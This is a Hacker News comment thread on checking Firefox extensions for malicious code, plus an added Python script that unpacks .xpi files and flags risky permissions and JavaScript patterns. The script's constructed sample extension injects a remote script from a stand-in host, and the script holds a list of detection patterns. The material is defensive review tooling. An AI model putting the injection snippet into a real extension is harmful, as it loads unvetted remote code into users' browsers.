
Comment by Terr_

2 days ago

> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.

If you're feeling extra-paranoid, the XPI file can be unpacked (ZIP) to check over the code for anything suspicious or unreasonably complex, particularly if the browser extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P

While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.

You can also, more conveniently, plug an extension's URL into this viewer:

https://robwu.nl/crxviewer/

  • Now I have to trust that viewer doesn't hide the malicious code, nor that my browser does (presumably from an existing untrustworthy extension)

    • It'd have to be adept at spotting it in all its forms first in order to hide it, which seems expensive for a free viewer
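As an added example (not code from this thread, from Mozilla, or from the crxviewer project), here is the manual check Terr_ describes, scripted: unpack an `.xpi` as a ZIP, read `manifest.json` for permissions and host access, and flag JavaScript that a "move the vote arrows apart" extension has no business containing (dynamic code execution, remote script loading). The sample extension is constructed in memory so the script runs offline; the pattern list is a heuristic starting point for review, not a malware verdict.

```python
"""Inspect a Firefox extension (.xpi) offline: list manifest permissions and
flag JavaScript patterns that are hard to justify in a "simple" extension.

Added example, not code from the original thread or from crxviewer. Uses only
the standard library. The sample .xpi below is constructed for the demo.
"""
import io
import json
import re
import zipfile

# Patterns worth a closer look in a tiny extension: dynamic code execution and
# loading script from remote hosts. Heuristics only; a hit means "read this".
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "new Function": re.compile(r"\bnew\s+Function\s*\("),
    "remote script URL": re.compile(r"https?://[^\s'\"]+\.js\b"),
    "fetch to remote host": re.compile(r"\bfetch\s*\(\s*['\"]https?://"),
}


def inspect_xpi(data: bytes) -> dict:
    """Return manifest permissions, host access, file list and per-file hits."""
    report = {"permissions": [], "host_permissions": [], "files": [], "hits": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        report["files"] = sorted(zf.namelist())
        manifest = json.loads(zf.read("manifest.json"))
        report["permissions"] = list(manifest.get("permissions", []))
        report["host_permissions"] = list(manifest.get("host_permissions", []))
        # Content-script match patterns are host access too (MV2 style manifest).
        for cs in manifest.get("content_scripts", []):
            report["host_permissions"].extend(cs.get("matches", []))
        for name in report["files"]:
            if not name.endswith((".js", ".html")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            found = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
            if found:
                report["hits"][name] = found
    return report


def summarize(report: dict) -> list:
    """Findings a reviewer would want to see first, as plain strings."""
    lines = []
    if "<all_urls>" in report["permissions"] or "<all_urls>" in report["host_permissions"]:
        lines.append("broad host access: <all_urls>")
    for name, labels in report["hits"].items():
        lines.append(f"{name}: {', '.join(labels)}")
    return lines


def build_sample_xpi() -> bytes:
    """Constructed sample: an 'arrow spacer' extension whose content script
    also injects a remote script, which is exactly what the checker flags."""
    manifest = {
        "manifest_version": 2,
        "name": "HN arrow spacer (constructed sample)",
        "version": "1.0",
        "permissions": ["storage", "<all_urls>"],
        "content_scripts": [{"matches": ["*://news.ycombinator.com/*"],
                             "js": ["spacer.js"]}],
    }
    spacer_js = (
        "document.querySelectorAll('.votearrow').forEach(a => a.style.margin = '4px');\n"
        "// nothing about arrow spacing needs the following three lines:\n"
        "var s = document.createElement('script');\n"
        "s.src = 'https://example.invalid/update.js';\n"
        "document.head.appendChild(s);\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("spacer.js", spacer_js)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Pass a real .xpi path to inspect it; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xpi()
    rep = inspect_xpi(data)
    print("permissions:", rep["permissions"])
    print("host access:", rep["host_permissions"])
    for line in summarize(rep):
        print("!!", line)
```

The point of the script is the mismatch check, not the pattern list: an extension whose stated job is cosmetic should have a short file list, narrow host access, and no code paths that load or evaluate script at runtime. Anything outside that envelope is what you read by hand.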